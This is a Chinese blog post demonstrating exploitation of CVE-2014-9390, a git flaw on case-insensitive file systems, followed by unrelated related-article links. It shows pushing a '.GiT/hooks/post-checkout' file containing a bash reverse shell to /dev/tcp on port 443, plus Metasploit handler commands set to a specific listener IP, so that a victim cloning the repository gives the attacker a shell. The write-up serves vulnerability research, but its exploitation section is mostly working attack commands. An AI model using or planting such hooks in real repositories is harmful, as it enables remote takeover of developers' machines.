One git command may cause you hacked(CVE-2014-9390)
0x00 背景
CVE-2014-9390是最近很火的一个漏洞,一个git命令就可能导致你被黑,我不打算深入探讨这个漏洞的细节,官方已经在https://github.com/blog/1938-git-client-vulnerability-announced 和http://article.gmane.org/gmane.linux.kernel/1853266发布了详细信息。总之,如果你使用了大小写不敏感的操作系统例如Windows或OSX,你应该更新git客户端了。
让我们以渗透测试的角度来看看这个漏洞。
0x01 准备
我创建了一个命名为CVE-2014-9390的新项目。

建立一个.GiT(大些G,小写i然后大写T)目录,创建一个vulnerable.txt文件,然后push到项目中。
|
1
2
3
4
5
6
7
8
9
10
|
root@rootlab:~/cve-2014-9390# mkdir .GiTroot@rootlab:~/cve-2014-9390# cd .GiT/root@rootlab:~/cve-2014-9390/.GiT# echo "Vulnerable" >> vulnerable.txtroot@rootlab:~/cve-2014-9390/.GiT# cd ..root@rootlab:~/cve-2014-9390# git add .root@rootlab:~/cve-2014-9390# git commit -m 'poc'[master bec157d] poc1 file changed, 1 insertion(+)create mode 100644 .GiT/vulnerable.txtroot@rootlab:~/cve-2014-9390# git push |
我们再从Windows的电脑上用存在漏洞的git客户端pull同一个项目看看
|
1
2
3
4
5
6
7
8
9
|
rootlab@MINCE ~$ git clone git@gitlab.com:mehmet/cve-2014-9390.gitCloning into 'cve-2014-9390'...Enter passphrase for key '/c/Users/rootlab/.ssh/id_rsa':remote: Counting objects: 7, done.remote: Compressing objects: 100% (3/3), done.remote: Total 7 (delta 0), reused 0 (delta 0)RReceiving objects: 100% (7/7), done.Checking connectivity... done. |
给大家看一下.git目录,本应该在.GiT目录的vulnerable.txt也在这里

0x02 利用
什么是git的hooks
与许多其他版本控制系统类似,一些重要的动作发生时,git有一个方法来执行自定义的脚本。hooks分两方面:客户端和服务器端。当进行commit和merge时可以触发客户端的hooks。
当执行git命令如git pull和git checkout时就可以执行客户端的脚本。
如何实现git hooks?
重写.git/hooks目录下的一个脚本文件,然后执行他,我们可以通过这个漏洞来实现。
我们创建一个假的git目录然后建立一个叫post-checkout的文件。
|
1
2
3
4
5
6
7
8
9
|
root@rootlab:~/cve-2014-9390# mkdir .GiT/hooksroot@rootlab:~/cve-2014-9390# echo '#!/bin/sh' > .GiT/hooks/post-checkoutroot@rootlab:~/cve-2014-9390# echo 'bash -i >& /dev/tcp/[IPADDRESS]/443 0>&1' >> .GiT/hooks/post-checkoutroot@rootlab:~/cve-2014-9390# git add .root@rootlab:~/cve-2014-9390# git commit -m 'add reverse connection payload'[master 389c979] add powershell payload1 file changed, 4 insertions(+)create mode 100644 .GiT/hooks/post-checkoutroot@rootlab:~//cve-2014-9390# git push |
我们在服务器端监听
|
1
2
3
4
5
6
7
|
msf > use exploit/multi/handlermsf exploit(handler) > set PAYLOAD generic/shell_reverse_tcpmsf exploit(handler) > set LPORT 443msf exploit(handler) > set LHOST 108.61.164.142msf exploit(handler) > exploit[*] Started reverse handler on 108.61.164.142:443[*] Starting the payload handler... |
我们clone https://gitlab.com/mehmet/cve-2014-9390

看起来都是很正常,但是……

One git command may cause you hacked(CVE-2014-9390)的更多相关文章
- [Tool] SourceTree初始化GitFlow遇到错误(git command not found)的解决方案
[Tool] SourceTree初始化GitFlow遇到错误(git command not found)的解决方案 问题情景 使用SourceTree,可以方便开发人员快速的套用GitFlow开发 ...
- Cordova 3.0 Plugin 安装 及"git" command line tool is not installed
根据http://docs.phonegap.com/en/edge/guide_cli_index.md.html#The%20Command-line%20Interface Windows命令行 ...
- [Practical Git] Navigate git command pager output with Unix less commands
When using a git command that can have a large amount of output (like git log, git diff, or git blam ...
- git: command not found
在使用git时,出现“git: command not found”的情况,于是使用yum安装: [root@localhost ~]# yum install -y gitLoaded plugin ...
- 警告: git command could not be found. Please create an alias or add it to yo
5 Answers active answertab=oldest#tab-top" title="Answers in the order they were provided& ...
- Git Command之Code Review
原文链接 准备 Step 1. Create a team and add a teammate Step 2. Create a repository with some content 应用 Cl ...
- git command
下载github代码 git clone https://github.com/zhoug2020/2015.git 在github上创建仓库: Create a new repository on ...
- git command line 提交代码
echo "# spring-boot-apollo-demo" >> README.md git init git add README.md git commit ...
- 解决git: 'subtree' is not a git command. See 'git --help'.
一.第一方法 git clone https://github.com/git/git.git cd git/contrib/subtree sudo make prefix=/usr sudo ma ...
随机推荐
- Android摄像头抓取图像的格式
android.hardware.Camera.PreviewCallback /** * Callback interface used to deliver copies of preview f ...
- Android源代码之DeskClock (一)
一.概述 一直有read the fucking source code的计划,可是实行起来都是断断续续的.到如今也没有真正得读过多少Android的源代码(主要是懒的).如今回忆起来实在是非常羞愧, ...
- C#邮件接收系统核心代码(接收POP3邮件IMAP邮件)
/* * Created by SharpDevelop. * User: Administrator * Date: 2013/11/18 * Time: 20:55 * * To change t ...
- 通过WriteProcessMemory改写进程的内存
http://www.cnblogs.com/feiyucq/archive/2009/10/21/1587628.html 以PROCESS_ALL_ACCESS权限打开进程以后既能够使用ReadP ...
- [Reactive Programming] RxJS dynamic behavior
This lesson helps you think in Reactive programming by explaining why it is a beneficial paradigm fo ...
- (转载)Windows 7 Ultimate(旗舰版)SP1 32/64位官方原版下载(2011年5月12日更新版)
MSDN于2011年5月12日,最新发布简体中文Windows 7 Ultimate 旗舰版 SP1 DVD镜像安装包,分32位和64位两个版本.最新发行代号分别是:677486(32位),67740 ...
- IOS 播放动态Gif图片
图片分为静态和动态两种,图片的格式有很多种,在开发中比较常见的是.png和.jpg的静态图片,但有的时候在App中需要播放动态图片,比如.gif格式的小表情头像,在IOS中并没有提供直接显示动态图片的 ...
- Python开发【第十三篇】:jQuery(二)
http://www.bubuko.com/infodetail-1438296.html 处理完毕需要整理贴进来 Python之路[第十三篇]jQuery案例-Form表单&插件及扩展 ...
- LENGTH和LENGTHB函数,substrb截取也是同一个道理。
oracle 利用 LENGTH和LENGTHB函数区分中英文(2009-02-07 10:49:29) 转载▼ 标签: it 分类: oracle 前一段时间,我一朋友问我怎么得出这个字符串是中文还 ...
- 简单的SqlHelper
namespace Login { class SqlHelper { //连接数据库的字符串 //static string dataConnection = "server=***-PC ...